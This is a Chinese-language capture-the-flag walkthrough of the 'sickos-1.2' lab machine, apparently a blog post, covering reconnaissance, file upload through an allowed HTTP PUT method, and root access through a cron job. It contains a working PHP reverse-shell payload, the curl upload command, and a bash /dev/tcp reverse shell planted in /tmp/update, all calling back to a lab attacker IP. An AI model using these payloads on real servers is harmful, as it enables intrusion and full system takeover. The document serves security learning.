文章描述了一次针对特定网站的黑客扫描过程,使用工具如Nmap探测HTTP方法,发现PUT上传漏洞,随后上传php探针并实现反弹shell。通过修改计划任务,最终实现对服务器的提权操作。
sickos-1.2
信息搜集
存活检测
详细扫描
后台网页扫描
网页信息搜集
查看扫描出的 index.php
查看扫描出的 /test 页面
是一个索引目录,其中显示了文件
对该网页进行扫描,探测是否有可操作空间
nmap --script http-methods --script-args http-methods.url-path='/test' 10.4.7.163
# --script http-methods 用于探测目标主机上支持的HTTP方法。
# --script-args http-methods.url-path='/test' 请求时使用/test作为URL路径
发现可以使用 PUT 上传等方法
漏洞利用
编写 php 探针
<?php phpinfo();?>
上传 php 探针
curl -v -T shell.php -H 'Expect:' "http://10.4.7.163/test/"
# -v 显示详细的输出信息
# -T 要上传的文件
# -H 'Expect:' 请求头被设置为空值。这是为了防止在上传文件时出现`Expect: 100-continue`请求头,因为某些服务器可能会拒绝该请求头。
刷新 /test 页面,成功上传探针
打开 shell.php 页面
可以成功执行 php 代码
生成反弹 shell 木马
<?php
$ip='10.4.7.146';
$port=443;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh ' , $descriptorspec,$pipes);
proc_close($process);
开启 443 端口监听(iptables 防火墙过滤规则中只允许源端口 443 和 8080,root 进去就可以查看,root 之前看别人攻略)
点击上传的木马文件
成功反弹
查看计划任务
ls -la /etc/cron*
查看版本
搜索漏洞并下载
查看文件
说在 /tmp 下创建一个 update 文件,写入命令会以 root 身份定期执行
给 update 执行权限 chmod +x update
printf '#!/bin/bash\nbash -i >& /dev/tcp/10.4.7.146/8080 0>&1\n' > /tmp/update
kali 开启 8080 端口监听
等待 root 权限的计划任务自动执行,以 root 身份反弹
提权成功
1998
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
